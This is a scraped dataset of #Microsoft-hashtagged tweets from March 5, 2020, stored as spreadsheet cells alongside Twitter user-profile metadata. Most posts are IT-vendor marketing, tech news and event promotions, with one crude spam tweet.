    <t>{'id': 2350504448, 'id_str': '2350504448', 'name': 'Global Venture', 'screen_name': 'AGlobalVenture', 'location': 'Global', 'description': 'At the intersection of natural resources, execution, and stability.', 'url': 'https://t.co/ZMIp1v1wkz', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZMIp1v1wkz', 'expanded_url': 'http://www.AGlobalVenture.com', 'display_url': 'AGlobalVenture.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 264, 'friends_count': 500, 'listed_count': 2, 'created_at': 'Tue Feb 18 18:25:35 +0000 2014', 'favourites_count': 467, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2904,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'http://pbs.twimg.com/profile_images/1059210342906187777/e1POZSSJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1059210342906187777/e1POZSSJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2350504448/1474150253',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</si>
  <si>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14:40:12 +0000 2020</t>
  </si>
  <si>
    <t>Day 63/366. 2003/10/21.
#VideoGameCollection #Games #Gaming #Microsoft #Xbox #CrimsonSkiesHighRoadToRevenge #FasaStudio #MicrosoftGameStudio @ Greensboro, North Carolina https://t.co/NTENMiiEDc</t>
  </si>
  <si>
    <t>Thu Mar 05 14:40:05 +0000 2020</t>
  </si>
  <si>
    <t>How is #Microsoft helping customers and partners reimagine healthcare and explore the possibilities in medical imaging? https://t.co/gzVukHU0CO
#healthcare #healthcaretech #nhs #publicsector https://t.co/415T9p94Zb</t>
  </si>
  <si>
    <t>{'id': 18976463, 'id_str': '18976463', 'name': 'Perfect Image', 'screen_name': 'perfectimage', 'location': 'UK', 'description': 'Empowering UK businesses with leading technologies &amp; our specialist IT services since 1991. #ITConsultancy | #BusinessApps | #DataAnalytics | #Cloud', 'url': 'https://t.co/nJ9c4IeB5H', 'entities': {'url': {'urls': [{'url': 'https://t.co/nJ9c4IeB5H', 'expanded_url': 'http://www.perfect-image.co.uk', 'display_url': 'perfect-image.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1042, 'friends_count': 1046, 'listed_count': 49, 'created_at': 'Wed Jan 14 13:43:44 +0000 2009', 'favourites_count': 782, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3134, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '006ECD', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/461625996035117056/GjNkZJx1_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/461625996035117056/GjNkZJx1_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18976463/1571907668', 'profile_link_color': '006ECD', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'ACC30E', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 14:38:36 +0000 2020</t>
  </si>
  <si>
    <t>Join us in DCI's high tech labs throughout Connecticut! Work on cool projects and earn credentials that employers want! #coding #careergoals #Technology #Cybersecurity #Programming #CompTIA #Cisco #Microsoft #jobs... https://t.co/HCC0rruoHJ</t>
  </si>
  <si>
    <t>Thu Mar 05 14:38:11 +0000 2020</t>
  </si>
  <si>
    <t>Training with #microsoft today!! https://t.co/Fipqpdl9iK</t>
  </si>
  <si>
    <t>{'id': 23391089, 'id_str': '23391089', 'name': 'Tiffany ðŸ‡¹ðŸ‡¹', 'screen_name': 'Min_Yoonchild', 'location': "Yoongi's lap", 'description': "If you are an irl and somehow found my account, leave. I'm not responsible for what you see here.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 818, 'friends_count': 153, 'listed_count': 10, 'created_at': 'Mon Mar 09 02:36:07 +0000 2009', 'favourites_count': 29412, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 27412,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'http://pbs.twimg.com/profile_images/1225745550894649344/_s2U_a22_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225745550894649344/_s2U_a22_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23391089/1581075661',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</si>
  <si>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14:36:40 +0000 2020</t>
  </si>
  <si>
    <t>Our aim is to help businesses get the most from migrating #SAP to #Azure, working with them to bring the best of @AccentureSA, #Microsoft and SAP to deliver an end-to-end solution that supports tangible business outcomes. #PowerOf3 https://t.co/EHNqv4sDfC</t>
  </si>
  <si>
    <t>Thu Mar 05 14:35:06 +0000 2020</t>
  </si>
  <si>
    <t>We know that #CyberAttacks now happen to 1 in 4 companies with the right software in place, having unprotected software highly increases this chance. #W7 #Windows7 #BusinessSoftware #Microsoft  https://t.co/8cPNl3z41r https://t.co/tvLRXsKjyd</t>
  </si>
  <si>
    <t>{'id': 193289553, 'id_str': '193289553', 'name': 'Landmark Technologies', 'screen_name': 'LandmarkTech', 'location': 'Dublin', 'description': 'The People Behind your IT', 'url': 'http://t.co/4xKmaMToYs', 'entities': {'url': {'urls': [{'url': 'http://t.co/4xKmaMToYs', 'expanded_url': 'http://www.landmark.ie', 'display_url': 'landmark.ie', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 220, 'friends_count': 498, 'listed_count': 5, 'created_at': 'Tue Sep 21 13:22:39 +0000 2010', 'favourites_count': 58, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 415,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'http://pbs.twimg.com/profile_images/1146086162827743233/cX-UMe4u_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1146086162827743233/cX-UMe4u_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/193289553/1565710361',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</si>
  <si>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14:34:51 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has asked all #Seattle and Bay #Area #employees to work from home until March 25 due to #coronavirus #fears 
@labordeolivier
@Claire_Harris82
@indsumanta
@HNTBCorpCIO
@MadanLaw
@NorthridgeGroup
@magnumpihonhi
@KeithKeller
https://t.co/SG2OvqvfL5</t>
  </si>
  <si>
    <t>{'id': 3816665602, 'id_str': '3816665602', 'name': 'John Pearce', 'screen_name': 'techpearce2', 'location': 'Manchester, England', 'description': '#cyber &amp; #technology #news @techpearce @JohnNews2u @techpearce3 @techpearce4 @johnpearcenews5  #machinelearning &amp; #ArtificialIntelligence #updates', 'url': 'https://t.co/DC4Zd4y3fk', 'entities': {'url': {'urls': [{'url': 'https://t.co/DC4Zd4y3fk', 'expanded_url': 'https://uk.linkedin.com/in/john-pearce-a83893a8', 'display_url': 'uk.linkedin.com/in/john-pearceâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 24671, 'friends_count': 25777, 'listed_count': 3822, 'created_at': 'Tue Sep 29 17:22:46 +0000 2015', 'favourites_count': 65124, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 142311,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'http://pbs.twimg.com/profile_images/1096970031655800832/uz9aGUWn_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1096970031655800832/uz9aGUWn_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3816665602/1550373211',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</si>
  <si>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14:34:02 +0000 2020</t>
  </si>
  <si>
    <t>Securing and managing personal #data is critical to you, your customers, and to complying with the requirements of #GDPR. 
Find out how #MicrosoftEMS will make #compliance worries a thing of the past, in this helpful #blog.
#Microsoft #EMS #Security
https://t.co/Y4Ql7AaqWf https://t.co/DHnsRqd15J</t>
  </si>
  <si>
    <t>Thu Mar 05 14:32:18 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft just released #PowerShell 7.0!  
#PowerShell7 #data #businessintelligence
https://t.co/QriRlOAeU9</t>
  </si>
  <si>
    <t>{'id': 135921805, 'id_str': '135921805', 'name': 'Key2 Consulting', 'screen_name': 'key2consulting', 'location': 'Atlanta, GA', 'description': 'Business intelligence company based in #Atlanta. We regularly create content around BI, analytics, the cloud, and more! \n\nSubscribe: https://key2consulting.us1', 'url': 'https://t.co/3Ou6CDEsqU', 'entities': {'url': {'urls': [{'url': 'https://t.co/3Ou6CDEsqU', 'expanded_url': 'http://www.key2consulting.com', 'display_url': 'key2consulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 768, 'friends_count': 1823, 'listed_count': 59, 'created_at': 'Thu Apr 22 15:07:57 +0000 2010', 'favourites_count': 661, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1417,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'http://pbs.twimg.com/profile_images/899331950862782464/pGLh1ppE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/899331950862782464/pGLh1ppE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/135921805/1573518328',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</si>
  <si>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14:32:03 +0000 2020</t>
  </si>
  <si>
    <t>The #Microsoft #staff in 1978.
#MS #Year1978 #Ano1978
#Anos70 #EquipeDaMicrosoft
#Windows #Win311 #Win95 #Windows95
#Windows98 #WindowsXP #Windows7 #WindowsVista #Windows10 #Win98 #WinXP #SistemaOperacional #OS #SO... https://t.co/2xMGr995KL</t>
  </si>
  <si>
    <t>{'id': 107438367, 'id_str': '107438367', 'name': 'Publicados Brasil', 'screen_name': 'publicados01', 'location': 'BRASIL', 'description': 'DOCUMENTARIOS E NOTICIAS, DOWNLOADS DIVERSOS...', 'url': 'http://t.co/Lm3iDpLOQt', 'entities': {'url': {'urls': [{'url': 'http://t.co/Lm3iDpLOQt', 'expanded_url': 'http://publicadosbrasil.blogspot.com', 'display_url': 'publicadosbrasil.blogspot.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 278, 'friends_count': 240, 'listed_count': 2, 'created_at': 'Fri Jan 22 15:21:09 +0000 2010', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3797,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'http://pbs.twimg.com/profile_images/648167419/publicadosbrasil_-_orkut_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/648167419/publicadosbrasil_-_orkut_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/107438367/1549042284',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</si>
  <si>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14:31:27 +0000 2020</t>
  </si>
  <si>
    <t>Update your password with the #microsoft authenticator app - rolling out soon https://t.co/IKtZF3UWUm</t>
  </si>
  <si>
    <t>{'id': 1114163064889171968, 'id_str': '1114163064889171968', 'name': 'Kelly Edinger', 'screen_name': 'EdingerKelly', 'location': 'sea', 'description': 'Office 365 Consultant | MCT | Business Readiness  @Go_Pivotal. #Teams #SharePoint #collaboration #serviceAdoption #trainer #womenintech', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 74, 'friends_count': 247, 'listed_count': 0, 'created_at': 'Fri Apr 05 13:49:09 +0000 2019', 'favourites_count': 466, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 177,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'http://pbs.twimg.com/profile_images/1114163214533578752/PdyR7BxY_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1114163214533578752/PdyR7BxY_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1114163064889171968/1554653113',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</si>
  <si>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14:30:24 +0000 2020</t>
  </si>
  <si>
    <t>Enhance Your #Microsoft #Outlook Experience with These 10 Tips &amp;amp; Tricks https://t.co/P0G0pV6l4i</t>
  </si>
  <si>
    <t>Thu Mar 05 14:30:16 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Last Week in the City   @GarryWhite looks at the market-moving events that have shaped equity markets last week on  https://t.co/SShoJt0Zdo
#coronavirus #airlines #China #Italy #Brexit #Mastercard #Marriott #Microsoft #tech #IPOs #Barclays #Disney #VirginGalactic https://t.co/ofQiSOiXLB</t>
  </si>
  <si>
    <t>{'id': 197367030, 'id_str': '197367030', 'name': 'Charles Stanley Wealth Managers', 'screen_name': '_CharlesStanley', 'location': 'London, UK', 'description': 'Inspiring conversation by addressing some of the big questions facing investors today.\nGet in touch to find out more.', 'url': 'https://t.co/l6K0eEgXDM', 'entities': {'url': {'urls': [{'url': 'https://t.co/l6K0eEgXDM', 'expanded_url': 'http://www.charles-stanley.co.uk', 'display_url': 'charles-stanley.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8159, 'friends_count': 3626, 'listed_count': 111, 'created_at': 'Fri Oct 01 09:23:58 +0000 2010', 'favourites_count': 521, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12809, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '00245D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/719519721259929605/UgFYFlAP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/719519721259929605/UgFYFlAP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/197367030/1583255350', 'profile_link_color': '00A7A7', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'CACBCC', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 14:30:04 +0000 2020</t>
  </si>
  <si>
    <t>Join us for this timely webcast and learn how to leverage the power of your Microsoft 365 investment for Situational/Crisis Response Management as well as Employee Communications and Engagement. #microsoft https://t.co/sbgWhl9IMq #MSFTAdvocate</t>
  </si>
  <si>
    <t>Thu Mar 05 14:29:57 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/SdjB4UwQE8
#Microsoft teases new #Windows 10 Start menu that de-emphasizes Live Tiles
#tech #computer #biz</t>
  </si>
  <si>
    <t>{'id': 960713462, 'id_str': '960713462', 'name': '4 Corner IT Florida', 'screen_name': '4CornerIT', 'location': 'Fort Lauderdale, Florida', 'description': '24/7/365 IT support in Miami, Fort Lauderdale, and the Palm Beaches. Managed IT services, network security and backup, web and application hosting.', 'url': 'https://t.co/MbsiTQA6kI', 'entities': {'url': {'urls': [{'url': 'https://t.co/MbsiTQA6kI', 'expanded_url': 'https://www.4cornerit.com', 'display_url': '4cornerit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 853, 'friends_count': 1980, 'listed_count': 86, 'created_at': 'Tue Nov 20 16:00:20 +0000 2012', 'favourites_count': 99, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3476, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '005AA9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/645977157924225024/W839kh6x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/645977157924225024/W839kh6x_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/960713462/1521040139', 'profile_link_color': '0C71AB',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</si>
  <si>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14:29:46 +0000 2020</t>
  </si>
  <si>
    <t>I want to fuck with a woman. I probably got sick #North Manchester   #microsoft #blockchain https://t.co/d2VuLn10e6</t>
  </si>
  <si>
    <t>{'id': 1235387055720587265, 'id_str': '1235387055720587265', 'name': 'Sheila Shafkind', 'screen_name': 'tesmomepo', 'location': 'Baltimore, USA', 'description': 'You may hold my hand for a while, but you hold my heart forever.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 18, 'listed_count': 0, 'created_at': 'Thu Mar 05 02:10:07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'http://pbs.twimg.com/profile_images/1235393487509610496/6FQWCL-d_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235393487509610496/6FQWCL-d_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235387055720587265/1583410835',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</si>
  <si>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14:29:01 +0000 2020</t>
  </si>
  <si>
    <t>The final stop on the DevOps tour is in NYC! Who's going to be joining us in the Big Apple?
#nycevents #nyctech #devops #microsoft #azure 
https://t.co/BDCZvw9euC</t>
  </si>
  <si>
    <t>{'id': 16813030, 'id_str': '16813030', 'name': 'New Signature', 'screen_name': 'newsignature', 'location': 'Washington, DC 20001', 'description': 'Microsoft US Partner of the Year 2014, 2015ðŸ†\n\nMicrosoft UK Partner of the Year 2019ðŸ†\n\nBest Companies for Women 2019 /Best Companies for Diversity 2019', 'url': 'https://t.co/paogFO8wOS', 'entities': {'url': {'urls': [{'url': 'https://t.co/paogFO8wOS', 'expanded_url': 'http://www.newsignature.com', 'display_url': 'newsignature.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1517, 'friends_count': 747, 'listed_count': 281, 'created_at': 'Thu Oct 16 19:55:14 +0000 2008', 'favourites_count': 2117, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7626,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'http://pbs.twimg.com/profile_images/344513261579188368/c2bd736446b89b2b55c80d894283691e_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/344513261579188368/c2bd736446b89b2b55c80d894283691e_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16813030/1456854180',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</si>
  <si>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14:29:00 +0000 2020</t>
  </si>
  <si>
    <t>Find out more about #TimeControl and Project at: https://t.co/lsFvwDEgaF. #Microsoft</t>
  </si>
  <si>
    <t>{'id': 802616078, 'id_str': '802616078', 'name': 'TimeControl', 'screen_name': 'HMS_TimeControl', 'location': 'Montreal, Quebec', 'description': 'TimeControl software is an enterprise timesheet solution designed to serve the needs of both finance and project management simultaneously.', 'url': 'http://t.co/Fw2ddwXhy6', 'entities': {'url': {'urls': [{'url': 'http://t.co/Fw2ddwXhy6', 'expanded_url': 'http://www.timecontrol.com', 'display_url': 'timecontrol.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3067, 'friends_count': 417, 'listed_count': 3, 'created_at': 'Tue Sep 04 15:15:23 +0000 2012', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 698,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'http://pbs.twimg.com/profile_images/2599310043/5q52dfdqvtgrj4xj1bbh_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2599310043/5q52dfdqvtgrj4xj1bbh_normal.jpeg',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</si>
  <si>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14:28:01 +0000 2020</t>
  </si>
  <si>
    <t>Our next #webinar, "What You Always Wanted to Know about #Microsoft #Azure Certifications" is on April 8, 2020, at 12:00 PM EST. We'll be covering the complete Azure certifications portfolio: https://t.co/6yJdBMFhx8 https://t.co/cFQsTSWknz</t>
  </si>
  <si>
    <t>{'id': 182916598, 'id_str': '182916598', 'name': 'ExitCertified', 'screen_name': 'ExitCertified', 'location': 'USA &amp; Canada', 'description': 'ExitCertified offers 9,500+ courses from dozens of top IT brands. Count on our award-winning, vendor-certified instructors to keep your skills up to date.', 'url': 'https://t.co/uWcX2EhnrF', 'entities': {'url': {'urls': [{'url': 'https://t.co/uWcX2EhnrF', 'expanded_url': 'http://www.exitcertified.com', 'display_url': 'exitcertified.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 590, 'friends_count': 229, 'listed_count': 52, 'created_at': 'Wed Aug 25 18:23:09 +0000 2010', 'favourites_count': 134, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1096, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F0F0F0', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1194291799579340800/Q0u1I3rl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194291799579340800/Q0u1I3rl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/182916598/1508258282', 'profile_link_color': '00AFD7',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</si>
  <si>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Thu Mar 05 14:27:46 +0000 2020</t>
  </si>
  <si>
    <t>@MrTaffinovic #Nintendo : N64, Gamecube, Wii, Gameboy (Initiale et color)
#Sony : PS1, PS2, PS3
#Microsoft : 360, One</t>
  </si>
  <si>
    <t>{'id': 860356705221320704, 'id_str': '860356705221320704', 'name': 'Aperoskull', 'screen_name': 'Aperoskull', 'location': 'Seine-et-Marne, Ile-de-France', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 37, 'friends_count': 368, 'listed_count': 0, 'created_at': 'Fri May 05 04:53:17 +0000 2017', 'favourites_count': 1314, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 551, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1147267285578592256/kdFpdDjs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1147267285578592256/kdFpdDjs_normal.jpg',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</si>
  <si>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14:25:14 +0000 2020</t>
  </si>
  <si>
    <t>BrandPost: In the digital economy, speed matters https://t.co/r66FgChj2y via @HYBRID_CIRCLE #Microsoft #Hybrid https://t.co/Sig7UxpUFV</t>
  </si>
  <si>
    <t>Thu Mar 05 14:23:33 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A14) D) Washington
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
Join @prashpatel_
@VimalDarji5 @karan875 @miteshgohel1188 @misssmita3</t>
  </si>
  <si>
    <t>{'id': 1081128120290140161, 'id_str': '1081128120290140161', 'name': 'ðŸ”¥Jay ParmarðŸ”¥', 'screen_name': 'Jay_parmar17', 'location': 'Gujarat, India', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1057, 'friends_count': 718, 'listed_count': 2, 'created_at': 'Fri Jan 04 10:00:05 +0000 2019', 'favourites_count': 25808, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 23015, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234848154723454977/av1hpxEd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234848154723454977/av1hpxEd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1081128120290140161/1579872135',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</si>
  <si>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14:22:25 +0000 2020</t>
  </si>
  <si>
    <t>An informative summary panel from @Glassdoor on the landing page of @Microsoft Careers section sends a compelling message to jobseekers
https://t.co/3t5c3Uwlfm
#Glassdoor #jobseekers #Microsoft #Website https://t.co/yF9u4tvRmF</t>
  </si>
  <si>
    <t>{'id': 911885791, 'id_str': '911885791', 'name': 'BowenCraggs', 'screen_name': 'BowenCraggs', 'location': '', 'description': 'Global online corporate comms experts. Helping you improve your digital effectiveness: web, social &amp; mobile. Tweets by David Bowen, Scott Payton &amp; Jason Sumner', 'url': 'https://t.co/8xeReZHMeh', 'entities': {'url': {'urls': [{'url': 'https://t.co/8xeReZHMeh', 'expanded_url': 'http://bowencraggs.com', 'display_url': 'bowencraggs.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 479, 'friends_count': 160, 'listed_count': 24, 'created_at': 'Mon Oct 29 06:41:42 +0000 2012', 'favourites_count': 53, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1001,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'http://pbs.twimg.com/profile_images/1121009846852227075/P_YGFLpQ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1121009846852227075/P_YGFLpQ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/911885791/1556104383', 'profile_link_color': '333333', 'profile_sidebar_border_color': 'C0DEED', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '0084B4', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 14:22:17 +0000 2020</t>
  </si>
  <si>
    <t>L2bridge Container Networking https://t.co/vTXBwsTKaY #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 14:21:00 +0000 2020</t>
  </si>
  <si>
    <t>What to expect for the accounting industry this year https://t.co/qcyYOxjKTk
#ThursdayThoughts #Microsoft #CloudERP #MsDynCRM #Consultants #CRM #MsPartner  #Resellers #franchises #FastFoodFranchise #Bookkeepers #CEO #OutsourcedCFOs #JustSayGo https://t.co/pLk0EPNEux</t>
  </si>
  <si>
    <t>{'id': 850066610094211072, 'id_str': '850066610094211072', 'name': 'Tim Sokoloski', 'screen_name': '365gravity', 'location': 'Grand Rapids, MI', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 130, 'friends_count': 164, 'listed_count': 8, 'created_at': 'Thu Apr 06 19:24:08 +0000 2017', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2886,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'http://pbs.twimg.com/profile_images/860209794551996416/s35Y5DQQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/860209794551996416/s35Y5DQQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/850066610094211072/1494353120',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</si>
  <si>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14:20:48 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft recognized by #Forrester as a leader in #EnterpriseBI in latest report, "The Forrester Wave: Enterprise BI Platforms (Vendor-Managed), Q3 2019." Highest scores in strategy and market presence. Read the blog. https://t.co/XInFan9ZEV</t>
  </si>
  <si>
    <t>{'id': 19043447, 'id_str': '19043447', 'name': 'Coretek', 'screen_name': 'Coretek', 'location': 'Farmington Hills, Michigan', 'description': 'Coretek Services - Infrastructure Optimization Services, Virtual Desktop Solutions, Cloud', 'url': 'http://t.co/SNs34myMkX', 'entities': {'url': {'urls': [{'url': 'http://t.co/SNs34myMkX', 'expanded_url': 'http://www.coretekservices.com', 'display_url': 'coretekservices.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 522, 'friends_count': 435, 'listed_count': 45, 'created_at': 'Thu Jan 15 22:49:49 +0000 2009', 'favourites_count': 135, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5699, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '064A87', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1588152570/LogoSqu_normal.gif', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1588152570/LogoSqu_normal.gif', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19043447/1555000705', 'profile_link_color': '064A87', 'profile_sidebar_border_color': '9B9B9B', 'profile_sidebar_fill_color': 'EDEDED', 'profile_text_color': '525252', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 14:20:01 +0000 2020</t>
  </si>
  <si>
    <t>Twitter testing beloved Story feature to have disappearing tweets !!
#twitter #facebook #instagram #snapchat #stories #24hours #disappearingstories #google #alphabet #apple #microsoft #billgates #satyanadela #samsung #oneplus #huawei #xiaomi #android 
 https://t.co/899dQv8JUI</t>
  </si>
  <si>
    <t>Thu Mar 05 14:19:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft released a Crisis Communication template for #PowerApps to help organizations mobilize support for employees during an emergency.  Check out the instructions in the link! https://t.co/gLBAGUjVP3</t>
  </si>
  <si>
